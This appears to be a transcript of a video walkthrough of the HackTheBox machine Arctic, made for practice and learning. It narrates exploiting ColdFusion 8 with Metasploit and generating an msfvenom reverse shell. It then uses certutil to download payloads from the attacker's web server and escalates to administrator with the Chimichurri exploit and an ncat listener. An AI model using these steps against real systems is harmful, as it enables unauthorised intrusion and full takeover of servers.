Hey guys, welcome back to another video with InfoSec Pat. In today's video, we're going to be talking about Arctic. This is another machine from HackTheBox. So if we look at my cherry tree, I want to go down this list. I believe I have some of these on my channel already, like Netmon, Jerry, Blue, Granny, I think. But now we're going to be doing Arctic. So active, I think we do have it on my channel. Legacy, I want to actually start marking these as done. But these are the boxes I want to start doing. And then if we go into our Linux boxes, we have some of these, I believe. I think Shocker. There's a few of them that I want to get done. I want to try to do all these boxes on my channel. So today we're going to be doing Arctic. So let's get started. So if you guys are new to the channel, thank you for checking me out. Please like, subscribe, share, and this just motivates for me to do more content like this. I heard this was a good box. It was fun. It was a good learning curve. So let's see how this goes. So I already ran my Nmap scan against this box. So you can see that we have port 135, 8500, 49154. So it's running JRun web server. So we see there's a web server running on this box. So if we just take this IP address and we copy this and we can just go to it. Let's paste that colon 8500 and let's see what's cooking. Okay. So we'll give that a moment. Once that's okay, that was pretty quick. So let's roll this in. All right, we have a CF ID, CF docs, user files. So if we just click around in here, I heard it's a slow machine. So, you know, let's see. Let's just click around. I'm not sure what's in here, what's not in here, and doesn't look like anything's in there. Let's just go back to. Let's go to CFID. Okay, so admin, API, administrator, devo, blah. Administrator looks pretty promising. Let's see what's on administrator. It's pretty slow. Like I was aware, this is a very slow machine. So it looks like there's a web portal, username, password. So it looks like it's Cold Fusion. All right, so that's cool. So what we can do here, we can just look online, see if there's anything that we can utilize to, maybe we can do a search exploit. Maybe we can just go online, see if there's any vulnerabilities to it. But I want to go ahead and just open up a new window. I'm just open up horizontal, and I want to zoom this in. I'll zoom this back in too, and just bring this up, just so we can start from a clean slate. Let me log back in. So let's bring this in a little more. All right. So what I want to do is I want to do a search exploit, Cold Fusion. Okay. So we can see that there's a boatload in here. So what I want to do is I want to go ahead and actually do number 8 because it's version 8. All right, that's a little better. All right, so what we can see here, we can see that there's a Metasploit right here. There's this bad boy. So we'd see directory traversal. So that should be, that should be good. So what we can do now is we can actually just load up, MSF console to see if we can search in there and see if there's any exploits for Windows that we can utilize. Let's just check it out. Let's just clear this. And let's just open up MSF console and see what we can see what's cooking. Give that a moment. So from this output, I want to start documenting like I used to. So I'm going to take this result, copy this. I want to open up Cherry Tree, add a new node. I want to put in I want to put in here Arctic, HackTheBox, just like HackTheBox. Okay. And then here, I want to go ahead and just put a sub note, and I want to put nmap. Okay. And I'm just going to throw that in there just for documentation's sake. Okay. We'll come back to that later. All right. So now we have MSF console up and running. So now what we can do is let's search for Cold Fusion. See if we get anything. Okay. That's, whoops. See if I can try to make this a little smaller and run that again. Okay, that's a little easier to read. Okay, so with this, what I want to do here is I'm going to utilize the best exploit that I think that we can utilize. And in here, I'm going to go ahead and use number 4, since this is excellent, and this is the version 8 that we were just checking out. So I want to use 4. Okay, let me clear this out. Make this maybe a little bigger, and I'm just going to do show options. And what we're going to do is I'm just going to go ahead and set up my R host, set up all the good stuff. So set R host, and my R host is going to be, did I lose connection? I heard it's super slow, so maybe make sure I didn't lose connectivity to it. Yeah, it's off. Wow, that was weird. All right, let's go ahead and turn that back on. That was really strange. Sorry about that. That's the whole out of here. Sorry about that. We'll give that a moment. Obviously, we'll give this a second, and then once this is up, we'll resume. Oh, never mind. All right, so we have our IP address. All right, so let's copy that. Let's make sure we can ping it. Did I lose connection to the VPN too? Let's see. Let's just kill this and rerun it. Okay. All right. Let's try to go ahead and do that again. There we go. I guess maybe my internet had a flicker. All right, no worries. So the R host is going to be our HackTheBox machine. So let's go ahead and set that. And then we're going to go ahead and set the R port. It's going to be 8500. Okay. And then the next thing we're going to do is set up a payload, because since this is a Java, I want to go ahead and set payload. And then it's going to be Java. And I believe it's going to be the JSP show reverse TCP. All right, we'll give that one a shot first. And let me just do an if config tunnel 0. All right, so that's going to be my local IP address. So I want to put set lhost. And it's going to be 10.14.12. Perfect here. And then since it's taken a long time to load, I want to try to just exploit it as is and see if we get any luck. And if it doesn't, we can show the advanced options, and then we can set up some additional settings. You see how upload failed? Because it's it's going to take too long. So let's go ahead and show advanced options. Okay. So what we can do here, we can set up a whole boatload of stuff in here, right? So what I want to do is set the HTTP timeout. So right here, client timeout. I want to go ahead and copy this. Okay. And then I want to go ahead and set to 150, just to have it, a little longer. Now let's try to exploit, see if that gives any luck. Okay, payload successful, awesome. So it looks like we have some luck So far, so good. Hopefully we can get perfecto. Awesome. So now we can see that we're working in Cold Fusion runtime bin. So if we could do, who am I? So we're just a regular user. We're not an admin. So what we can do is just go ahead and capture the user flag. So where the user flags are normally on the desktop of the user. So I can just put TYPE, and then I can just go right to the user, which is Tolus. That's how you say that name. So I want to go to users, Tolus, and then desktop. And then it's going to be the user.txt. That's how. Okay, perfect. Awesome. So we got the first flag. Let's copy that. Let's go ahead and go to the HackTheBox, submit flag, and let's paste that there. Now let's say that's a 3. And let's see, hopefully that takes it. Awesome. Cool. So now let's get back to business. So now what we can do, let's just run a system info real quick. I want to see something. All right. So as we can see here in the windows, you can use system info and you can see all the information on that system. You can take this, like, say for example, you're doing an assessment. You can actually take all this and just throw it in your, your notes, whatever. If you're using pentest.ws or however you're documenting your process of your assessment. So we know it's a Windows Server 2008 R2 and all this good stuff, right? So now what we have to do is we're going to go ahead and now we have to escalate our permissions. So let's go ahead and give that a go. And the way I want to do that, I'm just going to go ahead and just do a Control V on here and background of session, yes. Okay. So if I do show session, we have that one session going. Okay. So let's just let that cook. And what we're going to do is we're going to set up a payload. Okay. So how, what we're going to do is use MSF Venom, and we can create this payload. And what I want to do is just set this up on the actual box and then go back to Metasploit. And then we can use a multi-handler and do all that good stuff. So let's just get to business. So what we're going to do here, I'm just going to in this Arctic's directory, what I'm going to do is MSF Venom, and then we're going to do the payload -p for payload, and we're going to do Windows, and then x64 because if you remember, we've seen it's a 64-bit. That's why I wanted to do system information. Okay, so x64, not 65. Creating my own, and then we're going to do interpreter. All right, I guess we have to type everything out. Interpreter, and then reverse underscore TCP. And then we're going to do an L host equals, what is my L host? Oh, I think I did it here. My L host is, right here. So it's going to be 10.10.14.12. Okay. And then we're going to do L ports equals, I want to put 4321 just for simplistic sake. And then I want to do a -A for architecture, and that's going to be a 64-bit architecture. And then I want to do a file of executable, right? Because it has to be an exe. And then I want to put this out to a file called, I don't know, shell.exe, just for, okay, just for simplistic sake, just for the demonstration of this video. Okay, so now we do an ls, we have that shell.exe. Okay, perfect. So now what we're going to do is we're going to go ahead and start a like a web server. So we're gonna do like Python HTTP server. So we can just do Python, nope, not that, and dash m, and then we're gonna do HTTP dash server, and then we'll do 80. Okay, so now that is listening. Now what we can do is just get onto, let's go back here. Okay, let's get back to business here. All right, so now what we're going to do is, let's go ahead. Let me see this. Let me actually look at another article. Okay, let me just, sorry guys. Okay, okay, cool. I just wanted to make sure I'm in the right spot. So now what we can do is go ahead and get back into the session. And with the session, let's think about this for a second. All right, so I'm just thinking for a second. All right, so let's just go ahead and do this. Let's do a session one. Okay, so now we're back in that session, right? So what we can do is just cd. Let's go to, see, Windows. Go ahead and cd Windows dir. And we have task. Okay, cd to task. Whoop. Sorry. dir. Okay, so we have, okay, okay, can't clear. All right, no sweat at all. So now since we're on this task, so what we're gonna do is upload, since we are listening over here, as you can see here. Since we're listening in this directory, what we have to do is upload that payload to our server. So this is gonna be a way to do it. And once we get this payload onto the server, and then we can use a multi-handler to interact with that. All right, so let's give this a go. All right, so let's just do. So when you use, if you're not sure how to do this, you can just do a quick Google search. I had to do it as well, and we don't do this. At least I don't do this every day. So we're gonna do cert util.exe, and then we're gonna do URL cache and split, and the file. It's gonna be HTTP 10.10. What is my IP address on there? If config tunnel 0. Okay, it's going to be .14. .12. Okay, and then what we're going to do is shell.exe, because that's what I named it. Okay, and then we're going to close this out and then put shell.exe. That's the file that we want. Okay, so now we should get some. Give this a moment. Now we can see that the get for the shell is up. So now if we do a dir now, we should see shell.exe here. Perfect. So we're good now, right? So now what we can do is what we're going to do now is run a MSF console. And what we're going to do quickly is we're going to create a multi-handler and run that on here on the box and talk back to our machine. So let's go ahead and do that really quick. Let's do use exploits multi-handler. Okay, handler. Okay, show options. Okay, so what we're going to do really quick is set lhost is, got it, copy this section. Okay, all right, so, and then one last thing is the L port. We can just set the L port to what we have it, so in my case, 4321. That's what my case for the shell.exe, and that's what I put into that payload. Okay. So if we put exploit now, we'll let that cook. And now if we run the shell here, .exe, it should take a second and connect up here. Invalid. Okay. That's really strange. Interesting. Okay. No sweat. That's interesting. Okay, so the command shell session closed. So it did execute. Did I made sure 1014, and all right, that's not a problem. We can try one more time. Exploit, and then let it listen, and then we'll run this shell.exe. See if it works that time. So that didn't work. All right, so let me think about this for a second. All right, so what I want to do is, all right, let's just go out to the interwebs and just Google. I believe there is if I remember correctly, there's something called like chimichurri something. Um, there's something on GitHub. So I think it's CHIMIC chimichurri GitHub exploit GitHub. Let's see if there's. Yes, I believe this is it. Let's see. Go to files. And I believe it's going to be it's 59 chimichurri. I believe it's this filed. All right, so let's go right to it. And I want to go ahead and get this. I want to copy that. I want to go to back to my, let's just cancel this, clear that out. So now what I want to do is just do a quick git clone and grab that down to my git clone and see if this exploit works. All right, so let's do an ls. So it is there, cd ls. So we could do the chimichurri right here. So cd to, let's go ahead and just do a thing, paste. Oops, didn't realize it didn't copy everything. Sorry guys. cd to, let's clear this, ls. All right, so compiled, let's go to compiled. All right, so this chimichurri.exe. All right, perfect. So we have that now. So now what we want to do is run. So now we have to get this onto our server. Okay, let's see if this theory works. Let's go ahead and in here we're going to do that same exact thing. So we're going to get this file onto the server, and once that file is on the server, we can try to execute that and see if we're able to escalate out permissions with this tool. All right. So from here, let's go ahead and just Let's just do Python 3. Let's do the same thing. Should be fine. And let that listen. And let's come back down here. All right, and we're gonna go ahead and do the same thing. Let's copy this, and I want to throw this in here really quick. So I have to make some changes. The chimichurri. So, oh crap, it's my fault. I didn't mean to do that. Just so I don't have any spell mistakes, I'm going to go to compiled, and this. I'm going to copy this. Go back here. Paste. Delete this, and then I want to take off shell, which is going to be chimichurri.exe. So I'll leave that on the screen for a second so you guys can follow along. And hopefully, if we copy this, we could throw this back into our task down here, paste it, and now we can pull that chimichurri from our local machine to the server. Give that a moment, see if it works. Okay, it's online, right? Something's cooking. Okay, looks good. Let's do a dir, and we have chimichurri right here. Perfect. So now what we can do is we're going to run this chimichurri, and hopefully we can get some action. So let's go ahead and do this. All right, so in here, I want to go ahead and just kill this. So what I want to do really, really quick is I'm going to listen for a connection to speak back to my my local desktop. So on here, what I want to do is I'm just doing ncat 1 2 3 4. I'll do 4 4 3 just to change it up. All right. So now on here on my server, if I run chimichurri to my IP address on this port, I should pop a shell. So let's see if this will work. This exploit will work. Let's copy this just so I can make sure everything is right. And then 10.10. Holy moly, I forgot my IP address. So get ready. If config tunnel 0, 14.12.12. And then I want to do 443 for my port number. That's listening on up here. So let's see if this works. Now technically, we'll give this a second and see if it connects. We'll give it more than a second. Okay, perfect. Here we go. So do who am I? Boom. Now we are golden. So now we can just go ahead and get the root flag so we can do CD and CD to users. And then we can do a dir administrator. So we can CD to administrator. And then CD to desktop. And then do a dir and a root type root.txt. Bada bing. Here we go. So we did both. Let's go ahead and put this up here. Submit this flag. Paste. I'll say a 4. And that should be it. Hopefully it says, whoa, that was loud. So Arctic has been pwned. So if you guys pwned it a different way, if you guys have any questions about this box, just feel free to, write to me. I would love to hear the feedback. Hopefully this has been informative for you guys. And I really appreciate you checking me out and more boxes to come. I really appreciate it. Thank you so much and have a beautiful day.